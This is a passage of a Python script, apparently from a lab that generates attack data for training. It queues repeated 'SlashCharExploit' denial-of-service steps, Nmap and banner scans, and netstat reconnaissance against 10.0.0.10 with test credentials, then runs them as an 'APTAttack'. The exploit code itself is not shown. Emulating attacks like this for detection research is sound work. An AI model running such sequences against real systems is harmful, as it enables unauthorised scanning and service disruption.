            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=600, pause=0), 1), (PauseStep(),),
            (Nmap10T5RecStep(0),), (PauseStep(),), (NmapBannerDiscStep("10.0.0.10", pause=0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=1000, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=1000, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=1000, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=1000, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=1000, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=1000, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0),), (PauseStep(),),
            ]
exp_details = []
atk = APTAttack(step_seq, "slash_char_dos_sftp_inst_cam_train", exp_details, "/output/experiment_details.pkl")
atk.run()
atk.save_in()
